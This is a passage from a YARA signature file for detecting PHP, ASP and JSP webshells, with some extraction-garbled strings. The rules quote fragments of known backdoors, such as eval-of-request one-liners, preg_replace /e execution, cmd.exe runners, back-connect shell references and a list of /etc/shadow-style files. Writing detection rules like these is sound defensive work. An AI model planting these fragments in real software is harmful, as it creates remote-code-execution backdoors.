$dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x" $s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" condition: all of them } rule Php_Webshell_webshell_aZRaiLPhp_v1_0 { strings: $s5 = "echo \" CHMODU \".substr(base_convert(@fileperms($" $s7 = "echo \"\" . $filena" $s9 = "// by: The Dark Raver" fullword condition: 1 of them } rule Php_Webshell_webshell_ironshell { strings: $s4 = "print \"<%@page import=\"java.net.*\"%><%String t=request." condition: all of them } rule Php_Webshell_webshell_mysqlwebsh { strings: $s3 = " \" title=\"<%=SubFolder.Name%>\"> ??????????????????: " fullword condition: all of them } rule Asp_Webshell_webshell_asp_1 { strings: $s4 = "!22222222222222222222222222222222222222222222222222" fullword $s8 = "<%eval request(\"pass\")%>" fullword condition: all of them } rule Asp_Webshell_webshell_ASP_tool { strings: $s0 = "Response.Write \"<DIR> " fullword condition: 2 of them } rule Jsp_Webshell_webshell_jsp_jshell { strings: $s0 = "kXpeW[\"" fullword $s4 = "[7b:g0W@W<" fullword $s5 = "b:gHr,g<" fullword $s8 = "RhV0W@W<" fullword $s9 = "S_MR(u7b" fullword condition: all of them } rule Asp_Webshell_webshell_ASP_zehir4 { strings: $s9 = "Response.Write \"" fullword condition: all of them } rule Php_Webshell_webshell_PHP_Shell_x3 { strings: $s4 = "  [" $s6 = "echo \"
    \");" fullword condition: all of them } rule Jsp_Webshell_webshell_jsp_k81 { strings: $s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword $s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword condition: 1 of them } rule Asp_Webshell_webshell_ASP_zehir { strings: $s9 = "Response.Write \"
    " condition: all of them } rule Php_Webshell_webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit { strings: $s1 = "" fullword condition: all of them } rule Php_Webshell_webshell_redirect { strings: $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" " condition: all of them } rule Jsp_Webshell_webshell_jsp_cmdjsp { strings: $s5 = "" fullword condition: all of them } rule Php_Webshell_webshell_Java_Shell { strings: $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword condition: 1 of them } rule Asp_Webshell_webshell_asp_1d { strings: $s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO" condition: all of them } rule Jsp_Webshell_webshell_jsp_IXRbE { strings: $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" condition: all of them } rule Php_Webshell_webshell_PHP_G5 { strings: $s3 = "echo \"Hacking Mode?
     Server's PHP Version:&n" $s4 = "  [" $s7 = "echo \"" $s3 = "" fullword $s2 = "out.print(\")     Filenam" $s8 = "print \"File: Tools\">" fullword $s4 = "Response.Write(\"

    FILE: \" & file & \"

    \")" fullword condition: all of them } rule Php_Webshell_webshell_PHP_co { strings: $s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword $s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword condition: all of them } rule Php_Webshell_webshell_PHP_150 { strings: $s0 = "HJ3HjqxclkZfp" $s1 = "" fullword condition: all of them } rule Php_Webshell_webshell_PHP_c37 { strings: $s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj')," $s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE]," condition: all of them } rule Php_Webshell_webshell_PHP_b37 { strings: $s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc" condition: all of them } rule Php_Webshell_webshell_php_backdoor { strings: $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword $s2 = "
    \" METHOD=GET >execute command:  " fullword
condition:
	all of them
}
rule Asp_Webshell_webshell_asp_cmdasp
{
strings:
	$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
	$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
condition:
	all of them
}
rule Jsp_Webshell_webshell_spjspshell
{
strings:
	$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
condition:
	all of them
}
rule Jsp_Webshell_webshell_jsp_action
{
strings:
	$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
	$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
condition:
	all of them
}
rule Php_Webshell_webshell_Inderxer
{
strings:
	$s4 = "Nereye :   " fullword
	$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
condition:
	all of them
}
rule Php_Webshell_webshell_ELMALISEKER_Backd00r
{
strings:
	$s0 = "response.write(\"" fullword
	$s6 = "\" name=\"url"
condition:
	all of them
}
rule Jsp_Webshell_webshell_jsp_inback3
{
strings:
	$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
condition:
	all of them
}
rule Php_Webshell_webshell_metaslsoft
{
strings:
	$s7 = "$buff .= \"[ $folder ]LINKOperating System : \".php_uname().\" \",in('text','mk_name"
	$s3 = "echo sr(15,\"\".$lang[$language.'_text21'].$arrow.\"\",in('checkbox','nf1"
	$s9 = "echo sr(40,\"\".$lang[$language.'_text26'].$arrow.\"\",\"Current File (import new file name and new file)
    Current file (fullpath)
      \".$pathname."
condition:
	all of them
}
rule Php_Webshell_webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx
{
strings:
	$s8 = "else {echo \"Running datapipe... ok! Connect to \".getenv(\"SERVER_ADDR\""
condition:
	all of them
}
rule Php_Webshell_webshell_2008_2009lite_2009mssql
{
strings:
	$s0 = "    Path.'/\\');"
	$s7 = "p('
    File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
condition:
	all of them
}
rule Php_Webshell_webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz
{
strings:
	$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
	$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
condition:
	all of them
}
rule Jsp_Webshell_webshell_807_dm_JspSpyJDK5_m_cofigrue
{
strings:
	$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
	$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
condition:
	1 of them
}
rule Php_Webshell_webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx
{
strings:
	$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
	$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
condition:
	all of them
}
rule Php_Webshell_webshell_404_data_in_JFolder_jfolder01_xxx
{
strings:
	$s4 = " "
condition:
	2 of them
}
rule Php_Webshell_webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz
{
strings:
	$s0 = "$this -> addFile($content, $filename);" fullword
	$s3 = "function addFile($data, $name, $time = 0) {" fullword
	$s8 = "function unix2DosTime($unixtime = 0) {" fullword
	$s9 = "foreach($filelist as $filename){" fullword
condition:
	all of them
}
rule Php_Webshell_webshell_c99_c66_c99_shadows_mod_c99shell
{
strings:
	$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
	$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
	$s4 = "
    array(\"Using PERL\",\"perl %path %localport %remotehos"
	$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
condition:
	2 of them
}
rule Jsp_Webshell_webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1
{
strings:
	$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"\"+" fullword
	$s4 = "out.println(\"
    File Manager - Current disk "\"+(cr.indexOf(\"/\") == 0?"
	$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
	$s8 = "\"
    "
condition:
	2 of them
}
rule Jsp_Webshell_webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend
{
strings:
	$s0 = "return new Double(format.format(value)).doubleValue();" fullword
	$s5 = "File tempF = new File(savePath);" fullword
	$s9 = "if (tempF.isDirectory()) {" fullword
condition:
	2 of them
}
rule Php_Webshell_webshell_c99_c99shell_c99_c99shell
{
strings:
	$s2 = "$bindport_pass = \"c99\";" fullword
	$s5 = " else {echo \"Execution PHP-code\"; if (empty($eval_txt)) {$eval_txt = tr"
condition:
	1 of them
}
rule Php_Webshell_webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat
{
strings:
	$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
	$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
	$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
	$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
condition:
	2 of them
}
rule Php_Webshell_webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx
{
strings:
	$s3 = "BODY, TD, TR {" fullword
	$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
	$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
condition:
	2 of them
}
rule Php_Webshell_webshell_000_403_807_a_c5_config_css_dm_he1p_xxx
{
strings:
	$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
	$s4 = "URL downUrl = new URL(downFileUrl);" fullword
	$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
	$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
	$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
	$s8 = "URLConnection conn = downUrl.openConnection();" fullword
	$s9 = "sis = request.getInputStream();" fullword
condition:
	4 of them
}
rule Php_Webshell_webshell_2_520_icesword_job_ma1
{
strings:
	$s1 = "" fullword
	$s3 = "" fullword
	$s8 = "" fullword
condition:
	2 of them
}
rule Jsp_Webshell_webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn
{
strings:
	$s0 = "
    \"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"
     " fullword
condition:
	all of them
}
rule Php_Webshell_webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY
{
strings:
	$s4 = "http://www.4ngel.net" fullword
	$s5 = " | PHP" fullword
	$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
	$s9 = "Codz by Angel" fullword
condition:
	2 of them
}
rule Php_Webshell_webshell_c99_locus7s_c99_w4cking_xxx
{
strings:
	$s1 = "$res = @shell_exec($cfe);" fullword
	$s8 = "$res = @ob_get_contents();" fullword
	$s9 = "@exec($cfe,$res);" fullword
condition:
	2 of them
}
rule Php_Webshell_webshell_browser_201_3_ma_ma2_download
{
strings:
	$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
	$s2 = "private static String tempdir = \".\";" fullword
	$s6 = "\""
condition:
	2 of them
}
rule Jsp_Webshell_webshell_000_403_c5_queryDong_spyjsp2010
{
strings:
	$s2 = "\" www.Expdoor.com" fullword
	$s5 = "     second(s) {gzip} usage:"
	$s17 = "<%if(request.getParameter(\"f\")"
condition:
	all of them
}
rule Php_Webshell_webshell_webshells_new_xxxx
{
strings:
	$s0 = "  " fullword
condition:
	all of them
}
rule Jsp_Webshell_webshell_webshells_new_JJjsp3
{
strings:
	$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
condition:
	all of them
}
rule Php_Webshell_webshell_webshells_new_PHP1
{
strings:
	$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
	$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
	$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
condition:
	1 of them
}
rule Jsp_Webshell_webshell_webshells_new_JJJsp2
{
strings:
	$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
	$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
	$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
	$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
condition:
	1 of them
}
rule Php_Webshell_webshell_webshells_new_radhat
{
strings:
	$s1 = "sod=Array(\"D\",\"7\",\"S"
condition:
	all of them
}
rule Asp_Webshell_webshell_webshells_new_asp1
{
strings:
	$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
	$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
condition:
	1 of them
}
rule Php_Webshell_webshell_webshells_new_php6
{
strings:
	$s1 = "array_map(\"asx73ert\",(ar"
	$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
	$s4 = "shell.php?qid=zxexp  " fullword
condition:
	1 of them
}
rule Php_Webshell_webshell_webshells_new_xxx
{
strings:
	$s3 = "" fullword
condition:
	all of them
}
rule Php_Webshell_webshell_GetPostpHp
{
strings:
	$s0 = "" fullword
condition:
	all of them
}
rule Php_Webshell_webshell_webshells_new_php5
{
strings:
	$s0 = "Error!\";" fullword
	$s2 = "DBHACKLERIN&klas=<%=aktifklas%>"
	$s3 = "www.aventgrup.net"
	$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
condition:
	1 of them
}
rule Php_Webshell_r57shell_php_php
{
strings:
	$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
	$s2 = "RusH security team"
	$s3 = "'ru_text12' => 'back-connect"
	$s4 = "r57shell"
condition:
	1 of them
}
rule Php_Webshell_rst_sql_php_php
{
strings:
	$s0 = "C:\\tmp\\dump_"
	$s1 = "RST MySQL"
	$s2 = "http://rst.void.ru"
	$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
condition:
	2 of them
}
rule Php_Webshell_wh_bindshell_py
{
strings:
	$s0 = "#Use: python wh_bindshell.py [port] [password]"
	$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
	$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
condition:
	1 of them
}
rule Php_Webshell_lurm_safemod_on_cgi
{
strings:
	$s0 = "Network security team :: CGI Shell" fullword
	$s1 = "#########################<>#####################################" fullword
	$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
condition:
	1 of them
}
rule Php_Webshell_c99madshell_v2_0_php_php
{
strings:
	$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
condition:
	all of them
}
rule Php_Webshell_backupsql_php_often_with_c99shell
{
strings:
	$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
	$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
condition:
	all of them
}
rule Php_Webshell_uploader_php_php
{
strings:
	$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
	$s3 = "Send this file: " fullword
	$s4 = "" fullword
condition:
	2 of them
}
rule Php_Webshell_telnet_pl
{
strings:
	$s0 = "W A R N I N G: Private Server"
	$s2 = "$Message = q$
     _____  _____  _____          _____   "
condition:
	all of them
}
rule Php_Webshell_w3d_php_php
{
strings:
	$s0 = "W3D Shell"
	$s1 = "By: Warpboy"
	$s2 = "No Query Executed"
condition:
	2 of them
}
rule Php_Webshell_WebShell_cgi
{
strings:
	$s0 = "WebShell.cgi"
	$s2 = "
    "
condition:
	2 of them
}
rule Php_Webshell_Dx_php_php
{
strings:
	$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in 
    Win Dir:
    \" method=\"POST"
condition:
	2 of them
}
rule Php_Webshell_Asmodeus_v0_1_pl
{
strings:
	$s0 = "[url=http://www.governmentsecurity.org"
	$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
	$s2 = "print \"Asmodeus Perl Remote Shell"
	$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
condition:
	2 of them
}
rule Php_Webshell_backup_php_often_with_c99shell
{
strings:
	$s0 = "#phpMyAdmin MySQL-Dump" fullword
	$s2 = ";db_connect();header('Content-Type: application/octetstr"
	$s4 = "$data .= \"#Database: $database" fullword
condition:
	all of them
}
rule Asp_Webshell_Reader_asp
{
strings:
	$s1 = "Mehdi & HolyDemon"
	$s2 = "www.infilak."
	$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%>
    " fullword
	$s1 = "[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
	$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
condition:
	1 of them
}
rule Php_Webshell_myshell_php_php
{
strings:
	$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
	$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
	$s2 = " $fileEditInfo = \"  :::::::  Owner: <font color=$"
condition:
	2 of them
}
rule Php_Webshell_SimShell_1_0___Simorgh_Security_MGZ_php
{
strings:
	$s0 = "Simorgh Security Magazine "
	$s1 = "Simshell.css"
	$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
	$s3 = "www.simorgh-ev.com"
condition:
	2 of them
}
rule Jsp_Webshell_jspshall_jsp
{
strings:
	$s0 = "kj021320"
	$s1 = "case 'T':systemTools(out);break;"
	$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
condition:
	2 of them
}
rule Php_Webshell_webshell_php
{
strings:
	$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
	$s3 = "PHP Web Shell"
condition:
	all of them
}
rule Php_Webshell_rootshell_php
{
strings:
	$s0 = "shells.dl.am"
	$s1 = "This server has been infected by $owner"
	$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
	$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
condition:
	2 of them
}
rule Php_Webshell_connectback2_pl
{
strings:
	$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
	$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
	$s2 = "ConnectBack Backdoor"
condition:
	1 of them
}
rule Php_Webshell_DefaceKeeper_0_2_php
{
strings:
	$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
	$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
	$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
condition:
	1 of them
}
rule Php_Webshell_shells_PHP_wso
{
strings:
	$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
	$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
condition:
	1 of them
}
rule Php_Webshell_backdoor1_php
{
strings:
	$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
	$s2 = "class backdoor {"
	$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
condition:
	1 of them
}
rule Asp_Webshell_elmaliseker_asp
{
strings:
	$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
	$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
	$s2 = "dim zombie_array,special_array"
	$s3 = "http://vnhacker.org"
condition:
	1 of them
}
rule Asp_Webshell_indexer_asp
{
strings:
	$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
	$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
condition:
	1 of them
}
rule Php_Webshell_DxShell_php_php
{
strings:
	$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
	$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
condition:
	1 of them
}
rule Php_Webshell_s72_Shell_v1_1_Coding_html
{
strings:
	$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
	$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
	$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
condition:
	1 of them
}
rule Php_Webshell_hidshell_php_php
{
strings:
	$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
condition:
	all of them
}
rule Asp_Webshell_kacak_asp
{
strings:
	$s0 = "Kacak FSO 1.0"
	$s1 = "if request.querystring(\"TGH\") = \"1\" then"
	$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
	$s4 = "mailto:BuqX@hotmail.com"
condition:
	1 of them
}
rule Php_Webshell_PHP_Backdoor_Connect_pl_php
{
strings:
	$s0 = "LorD of IRAN HACKERS SABOTAGE"
	$s1 = "LorD-C0d3r-NT"
	$s2 = "echo --==Userinfo==-- ;"
condition:
	1 of them
}
rule Php_Webshell_Antichat_Socks5_Server_php_php
{
strings:
	$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
	$s3 = "#   [+] Domain name address type"
	$s4 = "www.antichat.ru"
condition:
	1 of them
}
rule Php_Webshell_Antichat_Shell_v1_3_php
{
strings:
	$s0 = "Antichat"
	$s1 = "Can't open file, permission denide"
	$s2 = "$ra44"
condition:
	2 of them
}
rule Php_Webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php
{
strings:
	$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
	$s1 = "Mode Shell v1.0</font></span>"
	$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
condition:
	1 of them
}
rule Php_Webshell_mysql_php_php
{
strings:
	$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
	$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
	$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
condition:
	1 of them
}
rule Php_Webshell_Worse_Linux_Shell_php
{
strings:
	$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
	$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
condition:
	1 of them
}
rule Php_Webshell_cyberlords_sql_php_php
{
strings:
	$s0 = "Coded by n0 [nZer0]"
	$s1 = " www.cyberlords.net"
	$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
	$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
condition:
	1 of them
}
rule Asp_Webshell_cmd_asp_5_1_asp
{
strings:
	$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
	$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
condition:
	1 of them
}
rule Php_Webshell_pws_php_php
{
strings:
	$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
	$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
	$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
condition:
	2 of them
}
rule Php_Webshell_PHP_Shell_php_php
{
strings:
	$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
	$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
condition:
	all of them
}
rule Php_Webshell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html
{
strings:
	$s0 = "Ayyildiz"
	$s1 = "TouCh By iJOo"
	$s2 = "First we check if there has been asked for a working directory"
	$s3 = "http://ayyildiz.org/images/whosonline2.gif"
condition:
	2 of them
}
rule Asp_Webshell_EFSO_2_asp
{
strings:
	$s0 = "Ejder was HERE"
	$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
condition:
	2 of them
}
rule Php_Webshell_lamashell_php
{
strings:
	$s0 = "lama's'hell" fullword
	$s1 = "if($_POST['king'] == \"\") {"
	$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
condition:
	1 of them
}
rule Php_Webshell_Ajax_PHP_Command_Shell_php
{
strings:
	$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
	$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
	$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
condition:
	1 of them
}
rule Jsp_Webshell_JspWebshell_1_2_jsp
{
strings:
	$s0 = "JspWebshell"
	$s1 = "CreateAndDeleteFolder is error:"
	$s2 = "<td width=\"70%\" height=\"22\"> <%=env.queryHashtable(\"java.c"
	$s3 = "String _password =\"111\";"
condition:
	2 of them
}
rule Php_Webshell_Sincap_php_php
{
strings:
	$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
	$s2 = "$tampon4=$tampon3-1"
	$s3 = "@aventgrup.net"
condition:
	2 of them
}
rule Php_Webshell_Test_php_php
{
strings:
	$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
	$s2 = "fwrite ($fp, \"$yazi\");" fullword
	$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
condition:
	1 of them
}
rule Php_Webshell_Phyton_Shell_py
{
strings:
	$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
	$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
	$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
	$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
condition:
	1 of them
}
rule Php_Webshell_mysql_tool_php_php
{
strings:
	$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
	$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
	$s4 = "<div align=\"center\">The backup process has now started<br "
condition:
	1 of them
}
rule Asp_Webshell_Zehir_4_asp
{
strings:
	$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
	$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
condition:
	1 of them
}
rule Php_Webshell_sh_php_php
{
strings:
	$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
	$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
condition:
	1 of them
}
rule Php_Webshell_phpbackdoor15_php
{
strings:
	$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
	$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
	$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
condition:
	1 of them
}
rule Php_Webshell_phpjackal_php
{
strings:
	$s3 = "$dl=$_REQUEST['downloaD'];"
	$s4 = "else shelL(\"perl.exe $name $port\");"
condition:
	1 of them
}
rule Php_Webshell_sql_php_php
{
strings:
	$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
	$s2 = "http://rst.void.ru"
	$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
condition:
	1 of them
}
rule Php_Webshell_cgi_python_py
{
strings:
	$s0 = "a CGI by Fuzzyman"
	$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
	$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
condition:
	1 of them
}
rule Php_Webshell_ru24_post_sh_php_php
{
strings:
